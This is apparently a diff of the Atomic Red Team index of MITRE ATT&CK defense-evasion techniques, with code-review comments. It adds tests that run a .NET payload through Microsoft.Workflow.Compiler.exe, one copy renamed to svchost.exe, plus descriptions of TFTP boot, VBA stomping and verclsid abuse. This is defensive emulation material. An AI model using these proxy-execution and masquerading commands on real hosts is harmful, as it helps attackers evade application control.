- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/478.html
- source_name: Registry Key Security
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
description: Microsoft. (2018, May 31). Registry Key Security and Access Rights.
@@ -34091,7 +38441,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:01:09.906Z'
+ modified: '2020-09-16T19:07:48.590Z'
created: '2020-03-13T11:42:14.444Z'
x_mitre_defense_bypassed:
- Application control
@@ -34320,7 +38670,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:39:02.045Z'
+ modified: '2020-10-21T18:37:15.275Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -34501,6 +38851,69 @@ defense-evasion:
command: '"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
'
+ - name: Microsoft.Workflow.Compiler.exe Payload Execution
+ auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
+ description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a
+ .Net assembly that launches calc.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ xml_payload:
+ description: XML to execution
+ type: path
+ default: PathToAtomicsFolder\T1218\src\T1218.xml
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net must be installed for this test to work correctly.\n"
+ prereq_command: 'if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
+ ) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'write-host ".Net must be installed for this test to work
+ correctly."
+
+'
+ executor:
+ command: |
+ Set-Location -path PathToAtomicsFolder\T1218\src ;
+ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt
+ name: powershell
+ elevation_required: false
+ - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
+ auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911
+ description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe
+ running a .Net assembly that launches calc.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ xml_payload:
+ description: XML to execution
+ type: path
+ default: PathToAtomicsFolder\T1218\src\T1218.xml
+ renamed_binary:
+ description: renamed Microsoft.Workflow.Compiler
+ type: path
+ default: PathToAtomicsFolder\T1218\src\svchost.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net must be installed for this test to work correctly.\n"
+ prereq_command: |
+ Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force
+ if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
+ get_prereq_command: 'write-host "you need to rename workflow complier before
+ you run this test"
+
+'
+ executor:
+ command: |
+ Set-Location -path PathToAtomicsFolder\T1218\src ;
+ #{renamed_binary} #{xml_payload} output.txt
+ name: powershell
+ elevation_required: false
T1216:
technique:
id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe
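Review bot: Neither new T1218 test defines a cleanup_command, so the renamed copy at `PathToAtomicsFolder\T1218\src\svchost.exe` created by the second test's prereq_command and the `output.txt` written by both executors remain on disk after the run, which leaves a masquerading binary on the host and can keep tripping AV/EDR long after the test; something like `cleanup_command: Remove-Item "#{renamed_binary}", PathToAtomicsFolder\T1218\src\output.txt -ErrorAction Ignore` on each test would restore the host. The renamed test's executor invokes `#{renamed_binary} #{xml_payload} output.txt` unquoted while the first test quotes `"#{xml_payload}"`; quoting both arguments keeps the command intact when PathToAtomicsFolder contains spaces. The get_prereq_command message also misspells "compiler" as "complier".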
@@ -34794,6 +39207,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1027.003
url: https://attack.mitre.org/techniques/T1027/003
+ - external_id: CAPEC-636
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/636.html
- url: https://en.wikipedia.org/wiki/Duqu
description: Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.
source_name: Wikipedia Duqu
@@ -34823,9 +39239,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-08T18:16:48.253Z'
+ modified: '2020-09-16T19:24:20.350Z'
created: '2020-02-05T14:28:16.719Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: Detection of steganography is difficult unless artifacts
are left behind by the obfuscation process that are detectable with a known
@@ -35250,6 +39666,70 @@ defense-evasion:
- Anti-virus
- File monitoring
atomic_tests: []
+ T1542.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1542.005
+ url: https://attack.mitre.org/techniques/T1542/005
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Secure Boot
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure
+ Boot. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Command History
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
+ History. Retrieved October 21, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Boot Information
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
+ Information. Retrieved October 21, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: TFTP Boot
+ description: |-
+ Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
+
+ Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)
+ id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ modified: '2020-10-22T16:35:53.806Z'
+ created: '2020-10-20T00:06:56.180Z'
+ x_mitre_data_sources:
+ - Network device run-time memory
+ - Network device command history
+ - Network device configuration
+ - File monitoring
+ - Network device logs
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+
+ Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1221:
technique:
id: attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534
@@ -35461,14 +39941,15 @@ defense-evasion:
atomic_tests: []
T1497.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Time Based Evasion
+ created: '2020-03-06T21:11:11.225Z'
+ modified: '2020-07-01T16:32:02.532Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
description: "Adversaries may employ various time-based methods to detect and
avoid virtualization and analysis environments. This may include timers or
other triggers to avoid a virtual machine environment (VME) or sandbox, specifically
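Review bot: This hunk and the two that follow it appear to only reorder the keys of the T1497.003 technique entry (the line counts net to zero and every value is unchanged), and the T1078 hunks near the end of the file look the same; if the index generator emitted technique keys in a stable order, these blocks would not appear in the diff and substantive changes such as the CAPEC reference fixes would be much easier to review. If the index is produced by a script, sorting keys (or preserving source order) at serialization time is the fix.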
@@ -35479,22 +39960,23 @@ defense-evasion:
Delays may also be based on waiting for specific victim conditions to be met
(ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104)
to avoid analysis and scrutiny. "
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-07-01T16:32:02.532Z'
- created: '2020-03-06T21:11:11.225Z'
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
- - Anti-virus
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ name: Time Based Evasion
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.003
+ url: https://attack.mitre.org/techniques/T1497/003
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -35504,15 +39986,13 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Deloitte Threat Library Team
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ - Anti-virus
atomic_tests: []
T1070.006:
technique:
@@ -35883,6 +40363,8 @@ defense-evasion:
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
+
+ On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
external_references:
- source_name: mitre-attack
external_id: T1205
@@ -35891,6 +40373,18 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
@@ -35901,7 +40395,7 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:27:41.755Z'
+ modified: '2020-10-21T15:30:44.964Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_contributors:
- Josh Day, Gigamon
@@ -35914,12 +40408,13 @@ defense-evasion:
- Linux
- macOS
- Windows
+ - Network
x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_is_subtechnique: false
atomic_tests: []
T1127:
@@ -36080,7 +40575,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-24T12:36:24.608Z'
+ modified: '2020-09-16T19:40:44.714Z'
created: '2020-01-30T16:18:36.873Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: false
@@ -36181,6 +40676,75 @@ defense-evasion:
- macOS
- Windows
atomic_tests: []
+ T1564.007:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1564.007
+ url: https://attack.mitre.org/techniques/T1564/007
+ - source_name: FireEye VBA stomp Feb 2020
+ url: https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html
+ description: 'Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February
+ 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September
+ 17, 2020.'
+ - source_name: Evil Clippy May 2019
+ url: https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/
+ description: 'Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant.
+ Retrieved September 17, 2020.'
+ - source_name: Microsoft _VBA_PROJECT Stream
+ url: https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239
+ description: 'Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream:
+ Version Dependent Project Information. Retrieved September 18, 2020.'
+ - source_name: Walmart Roberts Oct 2018
+ url: https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278
+ description: Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping
+ — Advanced Maldoc Techniques. Retrieved September 17, 2020.
+ - source_name: pcodedmp Bontchev
+ url: https://github.com/bontchev/pcodedmp
+ description: Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler.
+ Retrieved September 17, 2020.
+ - source_name: oletools toolkit
+ url: https://github.com/decalage2/oletools
+ description: decalage2. (2019, December 3). python-oletools. Retrieved September
+ 18, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: VBA Stomping
+ description: |-
+ Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
+
+ MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
+
+ An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)
+ id: attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-23T11:31:50.407Z'
+ created: '2020-09-17T12:51:40.845Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - MS Office version specified in _VBA_PROJECT stream must match
+ host
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
+
+ If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Rick Cole, FireEye
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ atomic_tests: []
T1055.014:
technique:
id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5
@@ -36273,13 +40837,8 @@ defense-evasion:
atomic_tests: []
T1078:
technique:
- id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Valid Accounts
- description: |-
- Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
-
- The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078
@@ -36295,8 +40854,13 @@ defense-evasion:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
+
+ The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ name: Valid Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -36307,13 +40871,31 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-06-20T22:44:36.043Z'
+ modified: '2020-10-19T16:01:22.724Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -36324,45 +40906,98 @@ defense-evasion:
- SaaS
- Office 365
- Azure AD
- x_mitre_effective_permissions:
- - User
- - Administrator
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Application control
- - System access controls
- - Anti-virus
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
- T1497:
+ T1218.012:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
+ external_id: T1218.012
+ url: https://attack.mitre.org/techniques/T1218/012
+ - source_name: WinOSBite verclsid.exe
+ url: https://www.winosbite.com/verclsid-exe/
+ description: verclsid-exe. (2019, December 17). verclsid.exe File Information
+ - What is it & How to Block . Retrieved August 10, 2020.
+ - source_name: LOLBAS Verclsid
+ url: https://lolbas-project.github.io/lolbas/Binaries/Verclsid/
+ description: LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.
+ - source_name: Red Canary Verclsid.exe
+ url: https://redcanary.com/blog/verclsid-exe-threat-detection/
+ description: 'Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy
+ a New Methodology: Verclsid.exe. Retrieved August 10, 2020.'
+ - source_name: BOHOPS Abusing the COM Registry
+ url: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
+ description: 'BOHOPS. (2018, August 18). Abusing the COM Registry Structure
+ (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.'
+ - source_name: Nick Tyrer GitHub
+ url: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
+ description: Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Virtualization/Sandbox Evasion
+ name: Verclsid
+ description: "Adversaries may abuse verclsid.exe to proxy execution of malicious
+ code. Verclsid.exe is known as the Extension CLSID Verification Host and is
+ responsible for verifying each shell extension before they are used by Windows
+ Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries
+ may abuse verclsid.exe to execute malicious payloads. This may be achieved
+ by running verclsid.exe /S /C {CLSID}, where the file is referenced
+ by a Class ID (CLSID), a unique identification number used to identify COM
+ objects. COM payloads executed by verclsid.exe may be able to perform various
+ malicious actions, such as loading and executing COM scriptlets (SCT) from
+ remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)).
+ Since it is signed and native on Windows systems, proxying execution via verclsid.exe
+ may bypass application control solutions that do not account for its potential
+ abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation:
+ BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) "
+ id: attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-08-19T19:29:18.138Z'
+ created: '2020-08-10T13:59:38.443Z'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Digital Certificate Validation
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Use process monitoring to monitor the execution and arguments
+ of verclsid.exe. Compare recent invocations of verclsid.exe with prior history
+ of known good arguments and loaded files to determine anomalous and potentially
+ adversarial activity. Command arguments used before and after the invocation
+ of verclsid.exe may also be useful in determining the origin and purpose of
+ the payload being executed. Depending on the environment, it may be unusual
+ for verclsid.exe to have a parent process of a Microsoft Office product. It
+ may also be unusual for verclsid.exe to have any child processes or to make
+ network connections or file modifications.
+ x_mitre_data_sources:
+ - Process use of network
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Rodrigo Garcia, Red Canary
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1497:
+ technique:
+ created: '2019-04-17T22:22:24.505Z'
+ modified: '2020-07-01T16:32:02.272Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
description: "Adversaries may employ various means to detect and avoid virtualization
and analysis environments. This may include changing behaviors based on the
results of checks for the presence of artifacts indicative of a virtual machine
@@ -36379,16 +41014,35 @@ defense-evasion:
if it is in an analysis environment. Additional methods include use of sleep
timers or loops within malware code to avoid operating within a temporary
sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n"
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-07-01T16:32:02.272Z'
- created: '2019-04-17T22:22:24.505Z'
- x_mitre_version: '1.2'
+ name: Virtualization/Sandbox Evasion
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
